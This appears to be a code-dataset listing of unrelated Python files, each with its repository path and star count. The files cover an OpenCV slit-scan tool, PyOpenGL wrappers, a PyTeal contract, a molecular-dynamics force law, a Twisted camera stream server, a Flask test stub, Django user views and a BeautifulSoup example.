'inshop': InShop,
'inshop_h5': InShop_hdf5,
}
def load(name, root, source, classes, transform = None):
return _type[name](root = root, source = source, classes = classes, transform = transform)
def load_inshop(name, root, source, classes, transform = None, dset_type='train'):
return _type[name](root = root, source = source, classes = classes, transform = transform, dset_type = dset_type)
| 1,024 |
src/SlitScanParameterSlider.py
|
AndrewFrauens/SlitScanCameraConcept
| 0 |
2023785
|
import numpy as np
import cv2
from typing import Tuple
class SlitScanParameterSlider:
def __init__(self, shape: Tuple[int, int, int], source_shape: Tuple[int, int, int], window_name: str):
self.accumulation_image = np.zeros(shape).astype(np.uint8)
self.split_image = np.zeros((shape[0], 4, 3)).astype(np.uint8)
self.window_name = window_name
self.step_size = 2
self.step_size_name = "step size"
self.step_size_max_value = source_shape[1]
self.step_through_source = 1 # 1 is truthy
self.step_through_source_name = "step through source"
self.step_through_source_max_value = 1
self.source_location = 0
self.source_location_max_value = source_shape[1]
self.source_location_name = "source location"
self.accumulation_image_location = 0
self.accumulation_image_location_max_value = shape[1]
self.accumulation_location_name = "accumulation location"
def set_step_size(self, step_size: int):
self.step_size = step_size
cv2.setTrackbarPos(self.step_size_name, self.window_name, self.step_size)
def set_step_through_source(self, step_through_source):
self.step_through_source = step_through_source
cv2.setTrackbarPos(self.step_through_source_name, self.window_name, self.step_through_source)
def set_source_location(self, source_location):
self.source_location = source_location
cv2.setTrackbarPos(self.source_location_name, self.window_name, self.source_location)
def set_accumulation_location(self, accumulation_location):
self.accumulation_image_location = accumulation_location
cv2.setTrackbarPos(self.accumulation_location_name, self.window_name, self.accumulation_image_location)
def start_viz(self):
cv2.namedWindow(self.window_name)
cv2.createTrackbar(self.step_size_name, self.window_name, self.step_size, self.step_size_max_value,
self.set_step_size)
cv2.createTrackbar(self.step_through_source_name, self.window_name, self.step_through_source,
self.step_through_source_max_value, self.set_step_through_source)
cv2.createTrackbar(self.source_location_name, self.window_name, self.source_location,
self.source_location_max_value, self.set_source_location)
cv2.createTrackbar(self.accumulation_location_name, self.window_name, self.accumulation_image_location,
self.accumulation_image_location_max_value, self.set_accumulation_location)
cv2.imshow(self.window_name, self.accumulation_image)
def update_image(self, input_frame):
# probably better to find openCV way to handle this
# didn't want to deal with edge cases of the 4 ways that the indexes could be in or outside of bounds
beam_image = np.copy(input_frame)
for col_count in range(self.step_size):
source_x = (self.source_location + col_count) % input_frame.shape[1]
dest_x = (self.accumulation_image_location + col_count) % self.accumulation_image.shape[1]
self.accumulation_image[:, dest_x] = input_frame[:, source_x]
cv2.line(beam_image, (source_x, 0), (source_x, input_frame.shape[1]), (0, 0, 255))
if (self.step_through_source == 1):
self.set_source_location((self.source_location + self.step_size) % input_frame.shape[1])
self.set_accumulation_location((self.accumulation_image_location + self.step_size) %
self.accumulation_image.shape[1])
cv2.imshow("input image", input_frame)
cv2.imshow("accumulation image", self.accumulation_image)
beam_bias = 0.5
beam_image = cv2.addWeighted(beam_image, beam_bias, input_frame, 1 - beam_bias, 0)
total_image = np.hstack((beam_image, self.split_image, self.accumulation_image))
cv2.imshow(self.window_name, total_image)
return total_image
| 4,033 |
env/Lib/site-packages/OpenGL/GL/VERSION/GL_3_3.py
|
5gconnectedbike/Navio2
| 210 |
2023053
|
'''OpenGL extension VERSION.GL_3_3
This module customises the behaviour of the
OpenGL.raw.GL.VERSION.GL_3_3 to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/VERSION/GL_3_3.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.VERSION.GL_3_3 import *
from OpenGL.raw.GL.VERSION.GL_3_3 import _EXTENSION_NAME
def glInitGl33VERSION():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
glGenSamplers=wrapper.wrapper(glGenSamplers).setOutput(
'samplers',size=lambda x:(x,),pnameArg='count',orPassIn=True
)
# INPUT glDeleteSamplers.samplers size not checked against count
glDeleteSamplers=wrapper.wrapper(glDeleteSamplers).setInputArraySize(
'samplers', None
)
# INPUT glSamplerParameteriv.param size not checked against 'pname'
glSamplerParameteriv=wrapper.wrapper(glSamplerParameteriv).setInputArraySize(
'param', None
)
# INPUT glSamplerParameterfv.param size not checked against 'pname'
glSamplerParameterfv=wrapper.wrapper(glSamplerParameterfv).setInputArraySize(
'param', None
)
# INPUT glSamplerParameterIiv.param size not checked against 'pname'
glSamplerParameterIiv=wrapper.wrapper(glSamplerParameterIiv).setInputArraySize(
'param', None
)
# INPUT glSamplerParameterIuiv.param size not checked against 'pname'
glSamplerParameterIuiv=wrapper.wrapper(glSamplerParameterIuiv).setInputArraySize(
'param', None
)
glGetSamplerParameteriv=wrapper.wrapper(glGetSamplerParameteriv).setOutput(
'params',size=_glgets._glget_size_mapping,pnameArg='pname',orPassIn=True
)
glGetSamplerParameterIiv=wrapper.wrapper(glGetSamplerParameterIiv).setOutput(
'params',size=_glgets._glget_size_mapping,pnameArg='pname',orPassIn=True
)
glGetSamplerParameterfv=wrapper.wrapper(glGetSamplerParameterfv).setOutput(
'params',size=_glgets._glget_size_mapping,pnameArg='pname',orPassIn=True
)
glGetSamplerParameterIuiv=wrapper.wrapper(glGetSamplerParameterIuiv).setOutput(
'params',size=_glgets._glget_size_mapping,pnameArg='pname',orPassIn=True
)
glGetQueryObjecti64v=wrapper.wrapper(glGetQueryObjecti64v).setOutput(
'params',size=_glgets._glget_size_mapping,pnameArg='pname',orPassIn=True
)
glGetQueryObjectui64v=wrapper.wrapper(glGetQueryObjectui64v).setOutput(
'params',size=_glgets._glget_size_mapping,pnameArg='pname',orPassIn=True
)
glVertexAttribP1uiv=wrapper.wrapper(glVertexAttribP1uiv).setInputArraySize(
'value', 1
)
glVertexAttribP2uiv=wrapper.wrapper(glVertexAttribP2uiv).setInputArraySize(
'value', 1
)
glVertexAttribP3uiv=wrapper.wrapper(glVertexAttribP3uiv).setInputArraySize(
'value', 1
)
glVertexAttribP4uiv=wrapper.wrapper(glVertexAttribP4uiv).setInputArraySize(
'value', 1
)
glVertexP2uiv=wrapper.wrapper(glVertexP2uiv).setInputArraySize(
'value', 1
)
glVertexP3uiv=wrapper.wrapper(glVertexP3uiv).setInputArraySize(
'value', 1
)
glVertexP4uiv=wrapper.wrapper(glVertexP4uiv).setInputArraySize(
'value', 1
)
glTexCoordP1uiv=wrapper.wrapper(glTexCoordP1uiv).setInputArraySize(
'coords', 1
)
glTexCoordP2uiv=wrapper.wrapper(glTexCoordP2uiv).setInputArraySize(
'coords', 1
)
glTexCoordP3uiv=wrapper.wrapper(glTexCoordP3uiv).setInputArraySize(
'coords', 1
)
glTexCoordP4uiv=wrapper.wrapper(glTexCoordP4uiv).setInputArraySize(
'coords', 1
)
glMultiTexCoordP1uiv=wrapper.wrapper(glMultiTexCoordP1uiv).setInputArraySize(
'coords', 1
)
glMultiTexCoordP2uiv=wrapper.wrapper(glMultiTexCoordP2uiv).setInputArraySize(
'coords', 1
)
glMultiTexCoordP3uiv=wrapper.wrapper(glMultiTexCoordP3uiv).setInputArraySize(
'coords', 1
)
glMultiTexCoordP4uiv=wrapper.wrapper(glMultiTexCoordP4uiv).setInputArraySize(
'coords', 1
)
glNormalP3uiv=wrapper.wrapper(glNormalP3uiv).setInputArraySize(
'coords', 1
)
glColorP3uiv=wrapper.wrapper(glColorP3uiv).setInputArraySize(
'color', 1
)
glColorP4uiv=wrapper.wrapper(glColorP4uiv).setInputArraySize(
'color', 1
)
glSecondaryColorP3uiv=wrapper.wrapper(glSecondaryColorP3uiv).setInputArraySize(
'color', 1
)
### END AUTOGENERATED SECTION
| 4,291 |
examples/unique-nft-asa/assets/stateless.py
|
vuvth/algo-builder
| 90 |
2024629
|
import sys
sys.path.insert(0,'..')
from algobpy.parse import parse_params
from pyteal import *
def c_p_lsig(ARG_P, ARG_NFT_APP_ID):
"""
- has `p` hardcoded as a constant;
- requires any transaction from `C_p` (this) to be in a group of transactions with an
App call.
"""
def basic_checks(txn: Txn): return And(
txn.rekey_to() == Global.zero_address(),
txn.close_remainder_to() == Global.zero_address(),
txn.asset_close_to() == Global.zero_address()
)
# we take payment in this lsig only when paired with App call
nft_creation = And(
# verify first transaction (Payment)
basic_checks(Gtxn[0]),
Gtxn[0].type_enum() == TxnType.Payment,
Gtxn[0].amount() == Int(10 ** 6), # 1 Algo
# verify second transaction (OPT-IN)
basic_checks(Gtxn[1]),
Gtxn[1].type_enum() == TxnType.ApplicationCall,
Gtxn[1].application_id() == Int(ARG_NFT_APP_ID),
Btoi(Gtxn[1].application_args[0]) == Int(ARG_P),
# verify third transaction (NFT creation)
basic_checks(Gtxn[2]),
Gtxn[2].type_enum() == TxnType.AssetConfig,
)
nft_transfer = And(
basic_checks(Gtxn[0]),
Gtxn[0].type_enum() == TxnType.ApplicationCall,
Gtxn[0].application_id() == Int(ARG_NFT_APP_ID),
basic_checks(Gtxn[1]),
Gtxn[1].type_enum() == TxnType.AssetTransfer
)
program = Cond(
[Global.group_size() == Int(3), nft_creation],
[Global.group_size() == Int(2), nft_transfer]
)
return program
if __name__ == "__main__":
params = {
"ARG_P": 133,
"ARG_NFT_APP_ID": 99
}
# Overwrite params if sys.argv[1] is passed
if(len(sys.argv) > 1):
params = parse_params(sys.argv[1], params)
print(compileTeal(c_p_lsig(params["ARG_P"], params["ARG_NFT_APP_ID"]), Mode.Signature, version = 4))
| 1,908 |
dynamol/forcelaws.py
|
bessavagner/dynamol
| 0 |
2024295
|
import numpy as np
class LennardJones:
def __init__(self, cutoff=None):
"""Implementa a interação de Lennard-Jonnes adimensional
Args:
sigma (número, optional): . Defaults to 1..
epsilon (número, optional): . Defaults to 1..
cutoff (número, optional): raio de corte. Defaults to None.
"""
if cutoff is None:
self.cutoff = 3.0
else:
self.cutoff = cutoff
self.F_cutoff = self.__force(self.cutoff)
self.V_cutoff = self.__potential(self.cutoff)
def force(self, rij, idx=0):
"""Força de Lennard-Jonnes deslocada
Args:
ri (np.array): posição
rj (np.array): posição
Returns:
np.array: força
"""
r = np.linalg.norm(rij)
if r == 0:
print(idx)
import sys
sys.exit()
if r < self.cutoff:
rm1 = 1.0/r
rm6 = rm1**6
rm7 = rm1*rm6
return (48.0*rm7*(rm6 - 0.5) - self.F_cutoff)*rij/r
else:
return np.zeros(rij.shape[0])
def potential(self, r, idx=0):
"""Força de Lennard-Jonnes deslocada
Args:
ri (np.array): posição
rj (np.array): posição
Returns:
np.número: potencial
"""
if r == 0:
print(idx)
import sys
sys.exit()
if r < self.cutoff:
rm1 = 1.0/r
rm6 = rm1**6
return 4.0*rm6*(rm6 - 1.0) - self.F_cutoff*(r - self.cutoff)\
- self.V_cutoff
else:
return 0
def __force(self, r):
"""Força de Lennard-Jonnes
Args:
ri (np.array): posição
rj (np.array): posição
Returns:
np.array: força
"""
rm1 = 1.0/r
rm6 = rm1**6
rm7 = rm1*rm6
return 48.0*rm7*(rm6 - 0.5)
def __potential(self, r):
"""Força de Lennard-Jonnes
Args:
ri (np.array): posição
rj (np.array): posição
Returns:
np.array: força
"""
rm1 = 1.0/r
rm6 = rm1**6
return 4.0*rm6*(rm6 - 1.0)
| 2,253 |
python/airi/stream.py
|
manuelnaranjo/AIRi
| 1 |
2023000
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
from twisted.web import http, server
from twisted.internet import protocol
from twisted.internet import reactor
from twisted.internet import defer
from twisted.internet import task
from twisted.web.resource import Resource
from twisted.python import log
from logging import DEBUG
from airi.camera.protocol import CameraFactory
from airi.camera import Listener
from airi import report, RESULT
from functools import partial
MULTIPARTRESPONSE= "--%s\r\nContent-Type: %s\r\nContent-Length: %s\r\n\r\n%s\r\n\r\n"
HTTP_DISCONNECT_TIMEOUT = 30 # half a minute timeout
CATEGORY = "AIRi-Stream"
class MultiPartStream():
BOUNDARY = 'myBOUNDARY'
clients = []
request = None
oneshot = False
@report(category=CATEGORY)
def __init__(self, request):
self.request = request
self.request.connectionLost = self.connectionLost
self.request.multipart=self
self.oneshot = self.request.args.get('oneshot', ['false',])[0].lower() == 'true'
self.thumbnail = self.request.args.get('thumbnail', ['false',])[0].lower() == 'true'
self.flash = 'flash' in self.request.args
MultiPartStream.clients.append(self)
@classmethod
def getBoundary(klass):
return "--%s\r\n" % (klass.BOUNDARY)
def writeBoundary(self):
self.request.write(MultiPartStream.getBoundary())
def writeStop(self):
self.request.write("%s--\r\n" % MultiPartStream.getBoundary())
@report(category=CATEGORY)
def process(self):
self.request.setHeader('Cache-Control', 'no-cache, no-store, must-revalidate;')
self.request.setHeader('Expires', '0');
self.request.setHeader('Pragma-directive', 'no-cache')
self.request.setHeader('Pragma', 'no-cache')
self.request.setHeader('Cache-directive', 'no-cache')
if not (self.oneshot or self.thumbnail):
self.request.setHeader('Connection', 'Keep-Alive')
if self.flash:
#self.request.setHeader('Content-Type',
# 'multipart/x-mixed-replace')
self.request.setHeader('Content-Type',
'text/html;')
else:
self.request.setHeader('Content-Type',
'multipart/x-mixed-replace;boundary=%s' % (self.BOUNDARY))
@report(category=CATEGORY)
def connectionTimeout(self):
'''Called after X seconds after the http stream is closed'''
if len(MultiPartStream.getClients(self.target)):
return
log.msg("No more clients, closing link")
CameraFactory.disconnect(self.target)
del self
@report(category=CATEGORY)
def connectionLost(self, reason):
'''Called when the http stream is closed'''
if self in MultiPartStream.clients:
MultiPartStream.clients.remove(self)
log.msg("Registering to disconnect in %s seconds" % HTTP_DISCONNECT_TIMEOUT)
reactor.callLater(HTTP_DISCONNECT_TIMEOUT,
MultiPartStream.connectionTimeout, self)
StreamResource.tellClientCount(self.target)
@report(category=CATEGORY)
def finish(self):
'''Gets called by oneshot or thumbnail modes'''
try:
self.request.finish()
except Exception, err:
log.err(err)
MultiPartStream.clients.remove(self)
def sendPart(self, content, mime="text/html", MULTIPART=None):
if self.oneshot or self.thumbnail:
try:
self.request.setHeader("Content-Type", mime)
self.request.setHeader("Content-Size", len(content))
self.request.write(content)
self.request.write("\n\n")
self.finish()
except Exception, err:
log.msg("error during sendPart")
log.err(err)
else:
if MULTIPART is None:
MULTIPART=MULTIPARTRESPONSE % (MultiPartStream.BOUNDARY, mime, len(content), content)
try:
self.request.write(MULTIPART)
except Exception, err:
log.msg("error during sendPart")
log.err(err)
@classmethod
def sendToClients(klass, content, mime="text/html"):
if len(klass.clients) == 0:
return
size = len(content)
out=MULTIPARTRESPONSE % (klass.BOUNDARY, mime, size, content)
for client in klass.clients:
client.sendPart(content, mime, out)
# log.msg("sendToClients, size: %s, count: %s" %(len(content), len(klass.clients)),
# loglevel=DEBUG,
# category="MultiPartStream")
@classmethod
def getClients(klass, address):
def internal():
for c in klass.clients:
if c.target.lower() == address:
yield c
address = address.lower()
return list(internal())
class StreamResource(Resource, Listener):
isLeaf = True
@classmethod
def getClients(klass, address):
return MultiPartStream.getClients(address)
@classmethod
@report(category=CATEGORY)
def tellClientCount(klass, address):
from airi.api import UpdateManager
UpdateManager.propagate(address, {
"client_count": len(klass.getClients(address))})
def gotFrame(self, frame, address):
size = len(frame)
out=MULTIPARTRESPONSE % (MultiPartStream.BOUNDARY, "image/jpeg", size, frame)
for client in StreamResource.getClients(address):
client.sendPart(frame, "image/jpeg")
@report(category=CATEGORY)
def lostConnection(self, reason, failed, address):
'''Called when the Bluetooth Link is lost'''
print "StreamResource.lostConnection", address
clients = StreamResource.getClients(address)
for c in clients:
c.sendPart(str(reason))
if not c.oneshot:
try:
c.request.finish()
except Exception, err:
log.err(err)
MultiPartStream.clients.remove(c)
StreamResource.tellClientCount(address)
@report(category=CATEGORY, level=RESULT)
def render_GET(self, request):
address = request.path.split("/",2)[-1].replace("_", ":")
request.transport.socket.settimeout(5)
multipart = MultiPartStream(request)
multipart.process()
multipart.target = address
if len(address) == 17:
ready = CameraFactory.isConnected(address) or CameraFactory.isPending(address)
if multipart.thumbnail and not ready:
multipart.sendPart("")
return server.NOT_DONE_YET
if not ready:
method = CameraFactory.getCamera(address).get("transport", "rfcomm")
method = request.args.get("method", [method,])[-1].upper()
try:
CameraFactory.connect(address, method=method)
except Exception, err:
log.msg("Failed while trying to connect")
log.err(err)
CameraFactory.registerListener(address, self)
StreamResource.tellClientCount(address)
return server.NOT_DONE_YET
class TestStreamResource(Resource):
isLeaf = True
def render_GET(self, request):
log.msg(str(request))
log.msg(str(request.requestHeaders))
multipart = MultiPartStream(request)
multipart.process()
return server.NOT_DONE_YET
def render_POST(self, request):
return self.render_GET(request)
if __name__ == '__main__':
import webcam
from twisted.web.server import Site
import sys
log.startLogging(sys.stdout)
webcam.init(False)
def sendFrame():
MultiPartStream.sendToClients(webcam.repeat().tostring(), "image/jpeg")
reactor.callLater(1/15., sendFrame)
root = Resource()
root.isLeaf = False
root.putChild("stream", TestStreamResource())
reactor.listenTCP(8800, Site(root), interface="0.0.0.0")
reactor.callLater(0, sendFrame)
reactor.run()#!/usr/bin/env python
| 8,162 |
src-gen/openapi_server/test/test_payments_controller.py
|
etherisc/bima-bolt-api
| 0 |
2024762
|
# coding: utf-8
from __future__ import absolute_import
import unittest
from flask import json
from six import BytesIO
from openapi_server.models.not_found_response import NotFoundResponse # noqa: E501
from openapi_server.models.payment import Payment # noqa: E501
from openapi_server.models.resource_id import ResourceId # noqa: E501
from openapi_server.test import BaseTestCase
class TestPaymentsController(BaseTestCase):
"""PaymentsController integration test stubs"""
def test_payments_event_id_get(self):
"""Test case for payments_event_id_get
"""
headers = {
'Accept': 'application/json',
}
response = self.client.open(
'/api/v1/acre-test'/payments/{event_id}'.format(event_id='4ad6f91d-6378-4f52-b817-00cbc85ca39x'),
method='GET',
headers=headers)
self.assert200(response,
'Response body is : ' + response.data.decode('utf-8'))
def test_payments_get(self):
"""Test case for payments_get
"""
headers = {
'Accept': 'application/json',
}
response = self.client.open(
'/api/v1/acre-test'/payments',
method='GET',
headers=headers)
self.assert200(response,
'Response body is : ' + response.data.decode('utf-8'))
def test_payments_post(self):
"""Test case for payments_post
"""
payment = {
"amount_paid" : 50.0,
"mobile_num" : "254711234567",
"mpesa_code" : "PC82GDN7C",
"mpesa_name" : "<NAME>",
"order_number" : "A100097-0321",
"call_time" : "2000-01-23T04:56:07.000+00:00",
"id" : "8dd6f91d-6378-4f52-b817-00cbc85ca39e"
}
headers = {
'Accept': 'application/json',
'Content-Type': 'application/json',
}
response = self.client.open(
'/api/v1/acre-test'/payments',
method='POST',
headers=headers,
data=json.dumps(payment),
content_type='application/json')
self.assert200(response,
'Response body is : ' + response.data.decode('utf-8'))
if __name__ == '__main__':
unittest.main()
| 2,258 |
cafeteria/users/views.py
|
devGW/PostApp
| 0 |
2024437
|
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from . import models, serializers
from cafeteria.notifications import views as notification_view
from allauth.socialaccount.providers.kakao.views import KakaoOAuth2Adapter
from rest_auth.registration.views import SocialLoginView
import requests
import json
class ExploreUser(APIView):
def get(self, request, format=None):
lastFive = models.User.objects.all().order_by('-date_joined')[:5]
serializer = serializers.ListUserSerializer(lastFive, many=True)
return Response(data=serializer.data, status=status.HTTP_200_OK)
class FollowUser(APIView):
def post(self, request, user_id, format=None):
user = request.user
try:
userToFollow = models.User.objects.get(id=user_id)
except models.User.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
create_notification = notification_view.create_notification(user, userToFollow, "follow")
user.following.add(userToFollow)
userToFollow.followers.add(user)
user.save()
userToFollow.save()
return Response(status=status.HTTP_200_OK)
class UnFollowUser(APIView):
def post(self, request, user_id, format=None):
user = request.user
try:
userToFollow = models.User.objects.get(id=user_id)
except models.User.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
user.following.remove(userToFollow)
userToFollow.followers.remove(user)
user.save()
userToFollow.save()
return Response(status=status.HTTP_200_OK)
class UserProfile(APIView):
def getUser(self, username):
try:
foundUser = models.User.objects.get(username=username)
return foundUser
except models.User.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
# 유저 프로필 보기
def get(self, request, username, format=None):
foundUser = self.getUser(username)
serializer = serializers.UserProfileSerializer(foundUser, context={"request": request})
return Response(data=serializer.data, status=status.HTTP_200_OK)
# 유저 프로필 수정
def put(self, request, username, format=None):
user = request.user
foundUser = self.getUser(username)
if("profile_image" in request.data):
if(request.data["profile_image"] == 'null'):
data = {'profile_image': None}
else:
data = request.data
else:
data = request.data
if user == foundUser:
serializer = serializers.UserProfileSerializer(
foundUser, data=data, partial=True, context={"request": request})
if serializer.is_valid():
serializer.save()
return Response(data=serializer.data, status=status.HTTP_200_OK)
else:
return Response(data=serializer.error, status=status.HTTP_400_BAD_REQUEST)
elif user != foundUser:
return Response(status=status.HTTP_401_UNAUTHORIZED)
class ChangePassword(APIView):
# 패스워드 변경
def put(self, request, username, format=None):
user = request.user
if user.username == username:
currentPassword = request.data.get('currentPassword', None)
match = user.check_password(currentPassword)
if match and currentPassword is not None:
newPassword = request.data.get('newPassword', None)
if newPassword is not None:
user.set_password(newPassword)
return Response(status=status.HTTP_200_OK)
else:
return Response(status=status.HTTP_400_BAD_REQUEST)
else:
return Response(status=status.HTTP_400_BAD_REQUEST)
else:
return Response(status=status.HTTP_401_UNAUTHORIZED)
class KakaoLogin(SocialLoginView):
adapter_class = KakaoOAuth2Adapter
class PushToken(APIView):
def getUser(self, username):
try:
foundUser = models.User.objects.get(username=username)
return foundUser
except models.User.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
def post(self, request, format=None):
username = request.user
foundUser = self.getUser(username)
serializer = serializers.UserPushToken(data=request.data)
if username == foundUser:
serializer = serializers.UserProfileSerializer(
foundUser, data=request.data, partial=True, allow_null=True, context={"request": request})
if serializer.is_valid():
serializer.save()
return Response(data=serializer.data, status=status.HTTP_200_OK)
else:
return Response(data=serializer.error, status=status.HTTP_400_BAD_REQUEST)
else:
return Response(data=serializer.error, status=status.HTTP_400_BAD_REQUEST)
class IsAlreadyId(APIView):
def get(self, request, username, format=None):
try:
foundID = models.User.objects.get(username=username)
return Response(status=status.HTTP_302_FOUND)
except models.User.DoesNotExist:
return Response(status=status.HTTP_202_ACCEPTED)
class IsAlreadyName(APIView):
def get(self, request, name, format=None):
try:
foundNickname = models.User.objects.get(name=name)
return Response(status=status.HTTP_302_FOUND)
except models.User.DoesNotExist:
return Response(status=status.HTTP_202_ACCEPTED)
class IsAlreadyEmail(APIView):
def get(self, request, email, format=None):
try:
foundEmail = models.User.objects.get(email=email)
return Response(status=status.HTTP_302_FOUND)
except models.User.DoesNotExist:
return Response(status=status.HTTP_202_ACCEPTED)
class StudentAuthentication(APIView):
def getUser(self, username):
try:
foundUser = models.User.objects.get(username=username)
return foundUser
except models.User.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
def put(self, request, format=None):
username = request.user
foundUser = self.getUser(username)
foundAdmin = self.getUser("admin")
if username == foundUser:
serializer = serializers.UserAuthentication(
foundUser, data=request.data, partial=True)
if serializer.is_valid():
serializer.save()
payload = {
"to": foundAdmin.push_token,
"title": "알림",
"sound": "default",
"body": "재학생 인증 요청이 왔습니다."
}
url = "https://exp.host/--/api/v2/push/send"
header = {
"Content-Type": "application/json",
}
requests.post(url, data=json.dumps(payload), headers=header)
return Response(data=serializer.data, status=status.HTTP_200_OK)
else:
return Response(data=serializer.error, status=status.HTTP_400_BAD_REQUEST)
else:
return Response(data=serializer.error, status=status.HTTP_400_BAD_REQUEST)
| 7,504 |
Beautiful Soup/beautifulsoup.py
|
Sid200026/Misc-Programs
| 3 |
2024223
|
from bs4 import BeautifulSoup
html_doc = "<p class='temp'>Hi</p>"
soup = BeautifulSoup(html_doc, 'lxml')
# print(soup.get_text())
# print(soup.name)
soup.find(text="Hi").replace_with("No")
print(soup.prettify())
| 212 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.